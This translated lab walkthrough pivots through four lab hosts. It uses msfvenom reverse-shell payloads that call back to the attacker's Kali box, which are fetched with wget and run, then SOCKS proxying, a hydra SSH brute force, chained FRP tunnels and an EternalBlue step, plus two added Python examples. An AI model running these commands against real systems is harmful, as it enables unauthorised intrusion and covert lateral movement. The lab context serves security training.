Multi-layer intranet tunneling (multi-hop pivoting)
I. Environment setup
1. Topology diagram
2. CentOS 1 host
NIC query
# check the IP addresses
[root@localhost ~]# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.0.2 netmask 255.255.255.0 broadcast 10.0.0.255
inet6 fe80::fee9:d6c:52e0:260b prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:4a:4e:87 txqueuelen 1000 (Ethernet)
RX packets 81 bytes 4860 (4.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 55 bytes 4643 (4.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens36: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.88.146 netmask 255.255.255.0 broadcast 192.168.88.255
inet6 fe80::8840:3279:6aaa:5bd4 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:4a:4e:91 txqueuelen 1000 (Ethernet)
RX packets 74 bytes 8627 (8.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 70 bytes 8374 (8.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 6 bytes 324 (324.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 6 bytes 324 (324.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Connectivity test
CentOS 1 can reach both Kali and CentOS 2.
3. CentOS 2 host
NIC query
Connectivity test, and starting the HTTP service
CentOS 2 can reach CentOS 1 and Windows 2003.
4. Windows 2003 host
NIC query
Connectivity test
Windows 2003 can reach CentOS 2.
II. Reverse shell from CentOS 1
In a real engagement you would already hold the highest privileges on the web server before starting lateral movement into the internal network.
The exploitation and privilege-escalation steps are skipped here; we go straight to the tunneling.
1. Build the payload
# build the payload (staged x64 Linux meterpreter calling back to Kali on port 4444)
┌──(root㉿kali-3)-[/home/sword/shell]
└─# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.88.141 LPORT=4444 -f elf > centos1.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
# list the directory
┌──(root㉿kali-3)-[/home/sword/shell]
└─# ls
centos1.elf pingtunnel pingtunnel_INFO_2023-11-09.log pingtunnel_linux_amd64.zip windows.exe
# serve the directory over HTTP
┌──(root㉿kali-3)-[/home/sword/shell]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
2. Start the listener
The handler is multi/handler with payload linux/x64/meterpreter/reverse_tcp on 192.168.88.141:4444 (it shows up as job 0 in the jobs listing further down).
3. Run the payload
# download the payload onto CentOS 1
[root@localhost ~]# wget http://192.168.88.141/centos1.elf
--2023-11-09 03:18:21-- http://192.168.88.141/centos1.elf
Connecting to 192.168.88.141:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: ‘centos1.elf’
100%[====================================================================================>] 250 --.-K/s in 0s
2023-11-09 03:18:21 (74.5 MB/s) - ‘centos1.elf’ saved [250/250]
You have new mail in /var/spool/mail/root
# make it executable
[root@localhost ~]# chmod +x centos1.elf
# run the payload in the background
[root@localhost ~]# ./centos1.elf &
[1] 1466
4. Host checks in
# list the sessions
msf6 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux root @ localhost.localdomain 192.168.88.141:4444 -> 192.168.88.146:56328 (192.168.88.146)
III. Information gathering
1. NIC information
# interact with the Linux session
msf6 > sessions 1
[*] Starting interaction with 1...
# check the current privileges
meterpreter > getuid
Server username: root
# list the network interfaces
meterpreter > ipconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : ens33
Hardware MAC : 00:0c:29:4a:4e:87
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.0.2
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::fee9:d6c:52e0:260b
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : ens36
Hardware MAC : 00:0c:29:4a:4e:91
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.88.146
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::8840:3279:6aaa:5bd4
IPv6 Netmask : ffff:ffff:ffff:ffff::
# add session routes so MSF modules can reach the subnets behind this host
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.0.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.88.0/255.255.255.0 from host's routing table.
# background the session (it stays alive)
meterpreter > bg
[*] Backgrounding session 1...
# view the session routes
msf6 > route
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
10.0.0.0 255.255.255.0 Session 1
192.168.88.0 255.255.255.0 Session 1
[*] There are currently no IPv6 routes defined.
Discovered internal subnet: 10.0.0.0/24. The 192.168.88.0/24 route is redundant, since Kali already sits on that network; it can be dropped with route remove 192.168.88.0 255.255.255.0 1.
2. Upload the fscan scanner
# upload the tool
meterpreter > upload /home/sword/fscan_amd64
[*] Uploading : /home/sword/fscan_amd64 -> fscan_amd64
[*] Uploaded -1.00 B of 5.93 MiB (0.0%): /home/sword/fscan_amd64 -> fscan_amd64
[*] Completed : /home/sword/fscan_amd64 -> fscan_amd64
# drop to a command shell
meterpreter > shell
Process 2299 created.
Channel 2 created.
# make it executable
chmod +x fscan_amd64
# confirm the execute bit is set
ls -l
total 6088
-rw-------. 1 root root 2600 Dec 5 2022 anaconda-ks.cfg
-rwxr-xr-x 1 root root 250 Nov 9 04:07 centos1.elf
-rwxr-xr-x 1 root root 6217056 Nov 9 04:31 fscan_amd64
-rw-------. 1 root root 2048 Dec 5 2022 original-ks.cfg
drwxrwxr-x. 6 root root 4096 Nov 6 02:05 redis-5.0.4
3. Host discovery
# scan the subnet for live hosts
./fscan_amd64 -h 10.0.0.0/24
Host 10.0.0.4 is found. The scan output also lists its open ports and the results of fscan's built-in password brute force.
IV. Start a proxy into the internal network
1. Use the MSF SOCKS proxy module
# leave the command shell
exit
# background the session to get back to msf
meterpreter > bg
[*] Backgrounding session 1...
# load the proxy module
msf6 > use auxiliary/server/socks_proxy
# show the module's required options
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local
machine or 0.0.0.0 to listen on all addresses.
# the proxy will listen on port 1080
SRVPORT 1080 yes The port to listen on
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
When VERSION is 5:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
USERNAME no Proxy username for SOCKS5 listener
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
# start the proxy module (it runs as a background job)
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
# list the background jobs
jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
# the payload listener
0 Exploit: multi/handler linux/x64/meterpreter/reverse_tcp tcp://192.168.88.141:4444
# the SOCKS proxy
1 Auxiliary: server/socks_proxy
2. Edit the proxychains config
On Kali I opened a second bash window and added the proxy at the very end of the file:
┌──(root㉿kali-3)-[/home/sword]
└─# vim /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
3. SSH brute force
In a new window, run hydra through proxychains (every connection is relayed through the meterpreter session, so -t 6 keeps the number of parallel tasks low):
┌──(root㉿kali-3)-[/home/sword]
└─# proxychains hydra -l root -P /home/sword/top500.txt 10.0.0.4 ssh -t 6
In a real engagement you would normally look for a system or web vulnerability, get a webshell and then escalate privileges.
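What proxychains does on behalf of hydra, ssh and scp here, as an added example (not code from this page, from proxychains or from Metasploit): the SOCKS5 exchange (RFC 1928) with 127.0.0.1:1080 using no authentication, which is what auxiliary/server/socks_proxy speaks when USERNAME and PASSWORD are left unset. The ScriptedSocket class is a stand-in for a real socket so the exchange can be shown offline; the canned replies it returns are constructed for the example. With a real socket connected to the proxy, socks5_connect() performs the actual handshake.

```python
# Added example, not from the original write-up: the SOCKS5 (RFC 1928)
# exchange that proxychains performs against MSF's socks_proxy on
# 127.0.0.1:1080 before handing the connected socket to hydra/ssh/scp.
import socket
import struct

SOCKS_VERSION = 0x05
NO_AUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {
    0: "succeeded", 1: "general SOCKS server failure", 2: "connection not allowed by ruleset",
    3: "network unreachable", 4: "host unreachable", 5: "connection refused",
    6: "TTL expired", 7: "command not supported", 8: "address type not supported",
}


def greeting():
    """Client hello offering a single auth method: none (MSF's socks_proxy
    with USERNAME/PASSWORD unset accepts exactly this)."""
    return bytes([SOCKS_VERSION, 1, NO_AUTH])


def connect_request(host, port):
    """CONNECT request. An IPv4 literal is sent as ATYP 1; any other name is
    sent as ATYP 3 so the proxy resolves it (proxychains does this remote
    resolution when proxy_dns is set, as it is in the default config)."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode()
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_reply(data):
    """Parse the server reply; returns (reply_code, bound_host, bound_port).
    A non-zero code is the proxy telling you the pivot could not reach the
    target (e.g. 4/5 when the session route or the target port is wrong)."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    rep, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        host, rest = socket.inet_ntoa(data[4:8]), data[8:]
    elif atyp == ATYP_DOMAIN:
        length = data[4]
        host, rest = data[5:5 + length].decode(), data[5 + length:]
    elif atyp == ATYP_IPV6:
        host, rest = socket.inet_ntop(socket.AF_INET6, data[4:20]), data[20:]
    else:
        raise ValueError(f"unknown address type {atyp:#x}")
    (port,) = struct.unpack("!H", rest[:2])
    return rep, host, port


def socks5_connect(sock, host, port):
    """Run the full handshake on a socket already connected to the proxy.
    Returns the (host, port) the proxy bound for us, or raises on refusal."""
    sock.sendall(greeting())
    version, method = sock.recv(2)
    if version != SOCKS_VERSION or method != NO_AUTH:
        raise ConnectionError(f"proxy refused no-auth (method byte {method:#x})")
    sock.sendall(connect_request(host, port))
    rep, bound_host, bound_port = parse_reply(sock.recv(262))
    if rep != 0:
        raise ConnectionError(f"CONNECT {host}:{port}: {REPLY_TEXT.get(rep, rep)}")
    return bound_host, bound_port


class ScriptedSocket:
    """Stand-in for a socket with canned proxy replies, so the exchange can be
    exercised offline. Records everything the client sent."""

    def __init__(self, replies):
        self.replies = list(replies)
        self.sent = []

    def sendall(self, data):
        self.sent.append(bytes(data))

    def recv(self, _size):
        return self.replies.pop(0)


if __name__ == "__main__":
    # Constructed replies: "no auth" accepted, then CONNECT succeeded with a
    # 0.0.0.0:0 bind address (a common choice for SOCKS servers).
    proxy = ScriptedSocket([b"\x05\x00", b"\x05\x00\x00\x01\x00\x00\x00\x00\x00\x00"])
    print("bound:", socks5_connect(proxy, "10.0.0.4", 22))
    for msg in proxy.sent:
        print("client ->", msg.hex(" "))
    # Against the real pivot:  s = socket.create_connection(("127.0.0.1", 1080))
    #                          socks5_connect(s, "10.0.0.4", 22)  # s now reaches CentOS 2's sshd
```

Two things are worth noticing in the bytes. The CONNECT request for 10.0.0.4:22 carries the target as a raw IPv4 address, so the proxy (and therefore MSF's route table) decides how to reach it; hydra never talks to 10.0.0.4 directly. And the reply code is the only diagnostic you get when a brute force through the proxy "hangs" or fails instantly: a 4 or 5 usually means the session route or the target port is wrong, not the credentials.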
V. Building the tunnel
1. Download FRP
- Download:
https://github.com/fatedier/frp/releases/tag/v0.52.3
- Chinese documentation:
https://github.com/fatedier/frp/blob/dev/README_zh.md
Tip:
If your attack box is Linux and the jump host is Windows, download both the Linux build and the Windows build.
If both are Linux, the Linux build alone is enough.
2. Installing the tool
(Shown in a newly opened session window.)
3. Edit the config files
There is a pitfall here; the second FRP setup method described later can be used instead.
# the frps control port is 7000
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cat frps.toml
bindPort = 7000
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cat frpc.toml
# jump host (frps) address
serverAddr = "192.168.88.146"
# jump host (frps) control port
serverPort = 7000
[[proxies]]
# proxy name
name = "centos1-tcp"
# protocol
type = "tcp"
# local address the tunnel delivers to
localIP = "127.0.0.1"
# local port the tunnel delivers to
localPort = 1000
# tunnel port opened on the jump host
remotePort = 2000
7000 is the control port: frpc on Kali connects to frps on the jump host on it.
1000 is the local port on Kali that the tunnel delivers to; the MSF handler will listen there.
2000 is the port frps opens on the jump host; anything that connects to it is forwarded through the tunnel to Kali's port 1000.
4. Upload the tools
# interact with session 1
msf6 > sessions 1
[*] Starting interaction with 1...
# upload the FRP archive
meterpreter > upload /home/sword/frp_0.52.3_linux_amd64.tar.gz
[*] Uploading : /home/sword/frp_0.52.3_linux_amd64.tar.gz -> frp_0.52.3_linux_amd64.tar.gz
[*] Uploaded -1.00 B of 11.24 MiB (0.0%): /home/sword/frp_0.52.3_linux_amd64.tar.gz -> frp_0.52.3_linux_amd64.tar.gz
[*] Uploaded -1.00 B of 11.24 MiB (0.0%): /home/sword/frp_0.52.3_linux_amd64.tar.gz -> frp_0.52.3_linux_amd64.tar.gz
[*] Completed : /home/sword/frp_0.52.3_linux_amd64.tar.gz -> frp_0.52.3_linux_amd64.tar.gz
# drop to a shell
meterpreter > shell
Process 1421 created.
Channel 6 created.
# spawn a pty for an interactive shell
python -c "import pty;pty.spawn('/bin/bash')"
# extract the archive
[root@localhost ~]# tar -xf frp_0.52.3_linux_amd64.tar.gz
# edit the config file
[root@localhost ~]# vim frp_0.52.3_linux_amd64/frpc.toml
Editing the config with vim inside this shell is painful, so I edit it on Kali and upload the finished file instead.
# copy the config file
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cp frpc.toml centos1.toml
# edit the copy
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# vim centos1.toml
# show the result
┌──(root㉿kali-3)-[/home/sword/frp_0.52.3_linux_amd64]
└─# cat centos1.toml
# CentOS 2 address (frps on the next hop)
serverAddr = "10.0.0.4"
# frps control port
serverPort = 7000
[[proxies]]
# proxy name
name = "centos2-tcp"
# protocol
type = "tcp"
# local address the tunnel delivers to (CentOS 1 itself)
localIP = "127.0.0.1"
# local port: the first tunnel's listener on CentOS 1
localPort = 2000
# port opened on CentOS 2
remotePort = 3000
Watch the spelling of serverPort, localPort and remotePort: a typo such as serverPost or localPost is not something you notice in the file, but it is not a setting frp reads, and the proxy will not come up the way you intended.
# interact with session 1
msf6 > sessions 1
[*] Starting interaction with 1...
# upload the config file with MSF
meterpreter > upload /home/sword/frp_0.52.3_linux_amd64/centos1.toml
[*] Uploading : /home/sword/frp_0.52.3_linux_amd64/centos1.toml -> centos1.toml
[*] Uploaded -1.00 B of 148.00 B (-0.68%): /home/sword/frp_0.52.3_linux_amd64/centos1.toml -> centos1.toml
[*] Completed : /home/sword/frp_0.52.3_linux_amd64/centos1.toml -> centos1.toml
5. Tunnel between Kali and CentOS 1
This builds the tunnel between Kali and CentOS 1.
# drop to a shell
meterpreter > shell
Process 1681 created.
Channel 8 created.
# run frps in the background (on CentOS 1)
./frp_0.52.3_linux_amd64/frps -c frps.toml &
2023/11/09 21:39:43 [I] [root.go:102] frps uses config file: frps.toml
2023/11/09 21:39:43 [I] [service.go:200] frps tcp listen on 0.0.0.0:7000
2023/11/09 21:39:43 [I] [root.go:111] frps started successfully
Run the client in a new window on Kali
# run frpc in the background
┌──(root㉿kali-3)-[~sword/frp_0.52.3_linux_amd64]
└─# ./frpc -c frpc.toml &
[1] 51236
2023/11/10 16:44:46 [I] [root.go:139] start frpc service for config file [frpc.toml]
2023/11/10 16:44:46 [I] [service.go:299] [2e44ab36c7cd1b9e] login to server success, get run id [2e44ab36c7cd1b9e]
2023/11/10 16:44:46 [I] [proxy_manager.go:156] [2e44ab36c7cd1b9e] proxy added: [TCP]
2023/11/10 16:44:46 [I] [control.go:173] [2e44ab36c7cd1b9e] [TCP] start proxy success
6. Regenerate the routes
The routes and the proxy module are set up again here because I had shut Kali down in between; the routes added earlier were only temporary.
# leave the shell
exit
# add the session routes
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.0.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.88.0/255.255.255.0 from host's routing table.
# background the session
meterpreter > bg
[*] Backgrounding session 1...
# proxy module
msf6 > use auxiliary/server/socks_proxy
# start it
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
7. Tunnel between CentOS 1 and CentOS 2
Upload FRP to CentOS 2
# upload FRP with scp through the SOCKS proxy
┌──(root㉿kali-3)-[~sword/frp_0.52.3_linux_amd64]
└─# proxychains scp /home/sword/frp_0.52.3_linux_amd64.tar.gz root@10.0.0.4:/root
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.0.4:22 ... OK
root@10.0.0.4's password:
frp_0.52.3_linux_amd64.tar.gz 100% 11MB 312.2KB/s 00:36
# ssh to CentOS 2 through the proxy
┌──(root㉿kali-3)-[~sword/frp_0.52.3_linux_amd64]
└─# proxychains ssh root@10.0.0.4
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.0.4:22 ... OK
# enter the password
root@10.0.0.4's password:
Last login: Fri Nov 10 14:02:34 2023 from 10.0.0.2
# extract
[root@CentOS-2 ~]# tar -xf frp_0.52.3_linux_amd64.tar.gz
# enter the directory
[root@CentOS-2 ~]# cd frp_0.52.3_linux_amd64
# run the server
[root@CentOS-2 frp_0.52.3_linux_amd64]# ./frps -c frps.toml &
[1] 2213
[root@CentOS-2 frp_0.52.3_linux_amd64]# 2023/11/10 14:29:27 [I] [root.go:102] frps uses config file: frps.toml
2023/11/10 14:29:27 [I] [service.go:200] frps tcp listen on 0.0.0.0:7000
2023/11/10 14:29:27 [I] [root.go:111] frps started successfully
Then start the frpc client on CentOS 1 with the centos1.toml uploaded earlier.
VI. Bringing CentOS 2 into MSF
1. Generate the payload
The callback address is CentOS 1 (10.0.0.2), port 2000, which frps on CentOS 1 forwards through the tunnel to Kali's port 1000.
2. Upload the payload
3. Start the listener on Kali
msf6 > handler -p linux/x64/meterpreter/reverse_tcp -H 0.0.0.0 -P 1000
[*] Payload handler running as background job 4.
[*] Started reverse TCP handler on 0.0.0.0:1000
msf6 > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler linux/x64/meterpreter/reverse_tcp tcp://192.168.88.141:4444
1 Auxiliary: server/socks_proxy
4 Exploit: multi/handler linux/x64/meterpreter/reverse_tcp tcp://0.0.0.0:1000
4. Run the payload
5. CentOS 2 checks in
6. FRP tunnel topology
In words:
When Windows 2003 connects to 172.168.0.128:3000 (CentOS 2), the connection is handed to 10.0.0.2:2000 (CentOS 1), which in turn forwards it to 192.168.88.141:1000 (Kali).
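The forwarding chain described above, and the port explanation given with the frpc.toml files earlier, as an added example (not code from this page and not frp's own): a short Python script that parses the frpc.toml subset used here, builds the table of (frps listener) to (frpc destination) mappings, and walks a connection hop by hop. The host names and addresses are the lab's from this page (CentOS 2's 172.168.0.128 comes from the topology text); the parser is a minimal one written for this example, not frp's config loader, and it also reports keys that are not frp settings, which is exactly what the serverPost/localPost/remotePost misspellings in a centos1.toml would be.

```python
# Added example, not from the original write-up: walk a connection through the
# chain of frp tcp proxies above. Minimal parser, written for this example only.

# Lab addressing from this page's ifconfig output and topology text.
HOSTS = {
    "kali": ["192.168.88.141"],
    "centos1": ["192.168.88.146", "10.0.0.2"],
    "centos2": ["10.0.0.4", "172.168.0.128"],
}
# frp v0.52 key names used on this page; anything else is reported as unknown.
KNOWN_TOP = {"serverAddr", "serverPort"}
KNOWN_PROXY = {"name", "type", "localIP", "localPort", "remotePort"}


def canon(ip):
    """Map an address to its lab host name; unknown addresses pass through."""
    return next((name for name, ips in HOSTS.items() if ip in ips), ip)


def parse_frpc_toml(text):
    """Parse the frpc.toml subset used here (key = value, [[proxies]], # comments).
    Returns (serverAddr, serverPort, proxies, unknown_keys)."""
    top, proxies, unknown = {}, [], []
    current = top
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line == "[[proxies]]":
            current = {}
            proxies.append(current)
            continue
        key, _, value = (part.strip() for part in line.partition("="))
        value = value.strip('"')
        if key not in (KNOWN_TOP if current is top else KNOWN_PROXY):
            unknown.append(key)  # e.g. serverPost: not a setting frp reads
        current[key] = int(value) if value.isdigit() else value
    return top.get("serverAddr"), top.get("serverPort", 7000), proxies, unknown


def forwarding_table(clients):
    """clients: [(client_host_name, frpc.toml text), ...]. For a tcp proxy, frps on
    serverAddr listens on remotePort and hands each connection to frpc, which then
    connects to localIP:localPort from the client host."""
    table, problems = {}, []
    for client, text in clients:
        server, _, proxies, unknown = parse_frpc_toml(text)
        if unknown:
            problems.append((client, unknown))
        for proxy in proxies:
            if proxy.get("type") != "tcp":
                continue
            if "localPort" not in proxy or "remotePort" not in proxy:
                problems.append((client, [f"{proxy.get('name')}: no localPort/remotePort"]))
                continue
            local_ip = proxy.get("localIP", "127.0.0.1")
            dest = client if local_ip == "127.0.0.1" else canon(local_ip)
            table[(canon(server), proxy["remotePort"])] = (dest, proxy["localPort"])
    return table, problems


def resolve(table, host, port, max_hops=8):
    """Follow frps listeners hop by hop until no proxy matches the current endpoint."""
    hop = (canon(host), port)
    path = [hop]
    while hop in table and len(path) <= max_hops:
        hop = table[hop]
        path.append(hop)
    return path


# Constructed from the page's frpc.toml (on Kali) and centos1.toml (on CentOS 1).
KALI_FRPC = """
serverAddr = "192.168.88.146"  # frps on CentOS 1
serverPort = 7000
[[proxies]]
name = "centos1-tcp"
type = "tcp"
localIP = "127.0.0.1"
localPort = 1000   # MSF handler on Kali
remotePort = 2000  # listener frps opens on CentOS 1
"""
CENTOS1_FRPC = """
serverAddr = "10.0.0.4"  # frps on CentOS 2
serverPort = 7000
[[proxies]]
name = "centos2-tcp"
type = "tcp"
localIP = "127.0.0.1"
localPort = 2000   # the first tunnel's listener on CentOS 1
remotePort = 3000  # listener frps opens on CentOS 2
"""
LAB_CLIENTS = [("kali", KALI_FRPC), ("centos1", CENTOS1_FRPC)]

if __name__ == "__main__":
    table, problems = forwarding_table(LAB_CLIENTS)
    print(" -> ".join(f"{h}:{p}" for h, p in resolve(table, "172.168.0.128", 3000)))
    print("config problems:", problems)
```

Run stand-alone it prints centos2:3000 -> centos1:2000 -> kali:1000. The direction of the arrows is the point: frp's tcp proxy always carries connections from the frps side to the frpc side, so the handler has to sit where frpc runs (Kali) and the callback target has to be the port frps listens on (CentOS 1:2000 for the CentOS 2 payload). A walk from 10.0.0.4:22 stops after one entry, because nothing listens for it in the tunnel; SSH to CentOS 2 still goes through the SOCKS proxy.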
VII. Windows 2003
1. NIC information
From the CentOS 2 session, a 172.168.0.0/24 subnet is discovered.
2. fscan scan
# upload the tool into the CentOS 2 session
meterpreter > upload /home/sword/fscan_amd64
[*] Uploading : /home/sword/fscan_amd64 -> fscan_amd64
[*] Uploaded -1.00 B of 5.93 MiB (0.0%): /home/sword/fscan_amd64 -> fscan_amd64
[*] Completed : /home/sword/fscan_amd64 -> fscan_amd64
# drop to a shell
meterpreter > shell
Process 3895 created.
Channel 2 created.
# spawn a pty for an interactive shell
python -c "import pty;pty.spawn('/bin/bash')"
# make it executable
[root@CentOS-2 ~]# chmod +x fscan_amd64
chmod +x fscan_amd64
# scan the subnet
[root@CentOS-2 ~]# ./fscan_amd64 -h 172.168.0.0/24
3. Discovered hosts and ports
4. Web service
5. System vulnerabilities and brute force
VIII. EternalBlue (MS17-010)
1. Tunnel setup
Kali has only one tunnel port, 1000, and it is currently occupied by the CentOS 2 shell. The two payloads are also different, so the Windows 2003 shell cannot call back to port 1000: a multi/handler only accepts the payload it was started with. (frp allows several [[proxies]] entries, so a second tcp proxy mapping another remotePort to a second handler port would be another way out.)
I did not think of this when setting up the lab, so this is also where I describe the second FRP setup method. First, stop the FRP service on Kali and both the FRP client and server on CentOS 1.
Start FRP on CentOS 1
Here 141 is Kali's IP address.
2. Restoring the environment
Because the tunnel is gone, CentOS 2 has dropped offline; the listener is still there, so go back to CentOS 2 and run the payload again.
Rebuild the payload
Upload the payload (delete the previous one first)
Run the payload
./centos2.elf &
Listen on Kali's port 2000
Add the routes
3. Exploit module
4. Set the parameters
5. Check the parameters
6. Run the exploit
This gives us the shell on the last host and completes the multi-layer intranet penetration. Real environments are far more complicated than this.